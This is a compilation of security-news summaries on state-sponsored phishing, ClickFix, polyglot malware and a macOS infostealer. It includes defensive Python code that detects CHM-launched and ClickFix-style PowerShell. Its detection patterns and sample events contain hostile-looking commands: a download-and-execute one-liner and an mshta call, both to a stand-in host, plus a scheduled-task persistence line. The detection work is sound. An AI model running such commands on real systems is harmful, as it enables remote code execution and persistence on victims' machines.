@securityonline.info
//
North Korean state-sponsored threat group Konni, also known as Opal Sleet or TA406, has been observed actively targeting Ukrainian government entities in cyber espionage campaigns. These operations focus on gathering strategic intelligence related to the ongoing conflict between Russia and Ukraine. The group utilizes phishing campaigns to collect information on the trajectory of the Russian invasion, indicating North Korea's sustained interest in the geopolitical dynamics and its willingness to leverage cyber capabilities for strategic advantage.
TA406's cyber espionage activities rely on sophisticated social engineering, often impersonating fictitious think tanks such as the "Royal Institute of Strategic Studies." The phishing emails carry lure content tied to current Ukrainian political events, particularly those surrounding former military leader Valeriy Zaluzhnyi. The attackers use password-protected RAR files hosted on MEGA, containing .CHM files with embedded PowerShell scripts, or HTML files and LNK shortcuts, to start the infection chain. Once a target opens the lure, PowerShell scripts gather extensive system information, including network configuration, system details, and the output of WMI queries. The collected data is Base64-encoded and transmitted to attacker-controlled servers, giving the operators a detailed picture of the targeted systems. For persistence, the group installs batch files as autorun entries and registers scheduled tasks, ensuring continued access to compromised machines.
@techradar.com
//
State-sponsored hacking groups from North Korea, Iran, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware. The technique tricks users into copying, pasting, and running a malicious command themselves, presented as the fix for a fabricated problem, and has now been adopted by advanced persistent threat (APT) groups, showing how fluidly tactics spread across the threat landscape. Researchers observed these groups incorporating ClickFix into their espionage operations between late 2024 and early 2025.
Proofpoint researchers documented this shift, noting that ClickFix replaces the installation and execution stages of existing infection chains. The technique uses dialog boxes with step-by-step instructions that lead victims to copy, paste, and run malicious commands on their own machines. These commands, disguised as solutions to fake error messages or security alerts, ultimately execute harmful scripts. Because the victim runs the command in their own session, there is no malicious attachment or exploit for mail gateways and attachment scanners to catch, which is what makes ClickFix effective. Specific examples include North Korea's TA427 targeting think tanks with spoofed emails and malicious PowerShell commands, and Iran's TA450 targeting organizations in the Middle East with fake Microsoft security updates. Russian-linked groups, such as UNK_RemoteRogue and TA422, have also experimented with ClickFix, distributing infected Word documents or using pages that mimic Google Spreadsheets to execute PowerShell commands. Experts warn that while some groups experimented with the technique in limited campaigns before returning to their standard tactics, the method is expected to be tested or adopted more widely by threat actors.
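Both chains above leave the same kind of trace on the endpoint: a script host started by an unexpected parent (hh.exe for the CHM lure described in the TA406 item, explorer.exe's Run dialog for a pasted ClickFix command), a Base64-encoded PowerShell argument, and a schtasks /create issued from a script host. The following is an added example and not code from Proofpoint or from the reports summarised here. It triages constructed Sysmon-style process-creation records (Event ID 1 field names; the process IDs, paths and the reserved example.invalid domain are made up for the sample) and decodes -EncodedCommand arguments so the analyst sees the real command rather than a Base64 blob.

```python
"""Triage constructed Sysmon-style process-creation events for CHM-launched
script hosts, ClickFix-style pasted commands, encoded PowerShell and
schtasks persistence. Added example; all sample events are constructed."""
import base64
import json
import re

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")

# Any unambiguous prefix of -EncodedCommand followed by a Base64 blob.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicators typical of a pasted one-liner: hidden window, encoded command,
# download cradle, in-memory execution, mshta fetching a URL.
CLICKFIX_INDICATORS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-e[a-z]*\s+[A-Za-z0-9+/=]{16,}"
    r"|\biex\b|invoke-expression|\biwr\b|invoke-webrequest"
    r"|\birm\b|invoke-restmethod|mshta\s+https?://|\bcurl\b[^|]*\|)",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand argument (UTF-16LE, Base64), else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Return the list of detection labels that apply to one process-creation event."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    labels = []
    if image in SCRIPT_HOSTS and parent == "hh.exe":
        labels.append("chm_spawned_script_host")      # HTML Help viewer launching a shell
    if (image in SCRIPT_HOSTS and parent in ("explorer.exe",) + BROWSERS
            and CLICKFIX_INDICATORS.search(cmdline)):
        labels.append("clickfix_pattern")             # Run dialog / browser parent + cradle
    if decode_encoded_command(cmdline) is not None:
        labels.append("encoded_command")
    if (image == "schtasks.exe" and parent in SCRIPT_HOSTS
            and re.search(r"/create\b", cmdline, re.IGNORECASE)):
        labels.append("scheduled_task_persistence")
    return labels


def scan(jsonl: str) -> list:
    """Run classify() over JSON-lines events; return (ProcessId, labels) for every hit."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        labels = classify(event)
        if labels:
            hits.append((event["ProcessId"], labels))
    return hits


# Constructed sample events (hypothetical PIDs and paths; example.invalid is reserved).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_ENCODED = base64.b64encode(
    "Get-WmiObject Win32_ComputerSystem".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "Image": PS, "ParentImage": "C:\\Windows\\hh.exe",
     "CommandLine": f"powershell.exe -w hidden -enc {SAMPLE_ENCODED}"},
    {"ProcessId": 4102, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"'},
    {"ProcessId": 4103, "Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": PS,
     "CommandLine": "schtasks /create /sc minute /mo 10 /tn Update /tr C:\\Users\\Public\\u.bat"},
    {"ProcessId": 4104, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f'"{PS}"'},                       # benign: user opened a shell
    {"ProcessId": 4105, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for pid, labels in scan(SAMPLE_JSONL):
        print(pid, labels)
```

explorer.exe is also the parent of every shell a user opens from the Start menu, so the parent alone is not a signal; the command-line indicators carry the weight, and on Windows the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU corroborates that the command was typed or pasted rather than launched by another program.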
Ridhika Singh@cysecurity.news
//
A sophisticated cyber espionage campaign, dubbed UNK_CraftyCamel, is actively targeting aviation and satellite organizations in the United Arab Emirates (UAE). Cybersecurity researchers at Proofpoint discovered this attack in October 2024. The attackers are employing advanced techniques, including the use of polyglot files, a custom Go-based backdoor known as Sosano, and compromised business accounts, to evade detection. This highly targeted campaign leverages compromised business relationships and tailored lures to deliver a multi-stage infection chain.
The attack begins with phishing emails sent from the compromised account of an Indian electronics company, INDIC Electronics. These emails contain links to malicious ZIP files hosted on domains designed to mimic legitimate companies. The ZIP archives hide the malware components in polyglot files, a technique rarely seen in espionage operations. A polyglot is laid out so that different parsers read the same bytes as different valid formats, which lets attackers place malicious content inside a file that looks legitimate to the parser a scanner happens to apply. Using polyglots points to an adversary focused on stealth and obfuscation. Once executed, the polyglot malware installs Sosano, a custom Go-based backdoor built for stealth and resilience. Sosano connects to a command-and-control server and waits for commands, which include listing directories, executing shell commands, and downloading additional payloads. While some tactics overlap with known Iranian-aligned threat actors, researchers have not definitively linked this activity to any previously identified group. The attackers' focus on aviation and satellite communications in the UAE suggests a strategic intelligence-gathering motive.
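To make the polyglot idea concrete, here is an added example (not Proofpoint's or the campaign's code) that builds a benign PDF/ZIP polyglot and then identifies it. It works because the two formats anchor at opposite ends of the file: a PDF reader starts at the %PDF- header, while a ZIP reader locates the end-of-central-directory record by scanning backwards from the end, so each ignores the other's bytes. The PDF and the ZIP member are constructed inline; only the standard library is used.

```python
"""Build a benign PDF/ZIP polyglot and detect it. Added example; the PDF
structure and the ZIP member content are constructed here."""
import io
import zipfile

PDF_MAGIC = b"%PDF-"
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def build_minimal_pdf() -> bytes:
    """A structurally valid, empty PDF with a correct xref table."""
    body = bytearray(b"%PDF-1.4\n")
    objects = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
    ]
    offsets = []
    for obj in objects:
        offsets.append(len(body))
        body += obj
    xref_pos = len(body)
    body += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        body += b"%010d 00000 n \n" % off
    body += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
             % (len(objects) + 1, xref_pos))
    return bytes(body)


def build_pdf_zip_polyglot(member_name: str, member_data: bytes) -> bytes:
    """Append a ZIP archive behind the PDF. zipfile in 'a' mode on non-ZIP data
    writes a fresh archive after the existing bytes with absolute offsets, which
    is exactly the layout a ZIP reader expects."""
    buf = io.BytesIO(build_minimal_pdf())
    with zipfile.ZipFile(buf, mode="a", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, member_data)
    return buf.getvalue()


def identify_formats(data: bytes) -> set:
    """Every format a lenient parser would accept, not only the one at offset 0."""
    found = set()
    head = data[:1024]
    if PDF_MAGIC in head:                 # PDF readers accept the header within the first 1 KiB
        found.add("pdf")
    if data.startswith(b"MZ"):
        found.add("pe")
    if b"<html" in head.lower() or b"<script" in head.lower():
        found.add("html")
    if zipfile.is_zipfile(io.BytesIO(data)):   # EOCD is found from the end, wherever the archive starts
        found.add("zip")
    return found


def appended_zip_offset(data: bytes) -> int:
    """Offset of the first ZIP local file header, or -1; a non-zero value means
    the archive was glued behind other content."""
    return data.find(ZIP_LOCAL_HEADER)


def is_polyglot(data: bytes) -> bool:
    return len(identify_formats(data)) > 1


def read_member(data: bytes, name: str) -> bytes:
    """Extract a member exactly as a ZIP-aware loader would, ignoring the PDF prefix."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    sample = build_pdf_zip_polyglot("notes.txt", b"constructed sample content")
    print(sorted(identify_formats(sample)), appended_zip_offset(sample))
```

The asymmetry is the practical lesson: the ZIP side is strict (the central directory must sit at the end), while the PDF side survives only because readers tolerate trailing bytes after %%EOF. A scanner that classifies a file by its first four bytes and stops will call this a PDF and never unpack the archive; checking for a ZIP end-of-central-directory record regardless of the leading magic closes that gap.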
SC Staff@scmagazine.com
//
The FakeUpdate malware campaigns are becoming increasingly complex with the emergence of new cybercrime groups, TA2726 and TA2727, now involved in pushing a new macOS infostealer called FrigidStealer. This malware is being distributed through web inject campaigns, where users are tricked into downloading fake browser updates. Proofpoint researchers have identified FrigidStealer as a new threat targeting Mac users.
This campaign also carries Windows and Android payloads, suggesting a broad targeting strategy. The malicious JavaScript that displays the fake browser update messages is being adopted by a growing number of threat actors, which makes tracking and attribution more challenging; Proofpoint accordingly tracks TA2726 and TA2727 as separate actors, each operating different components of these web inject campaigns.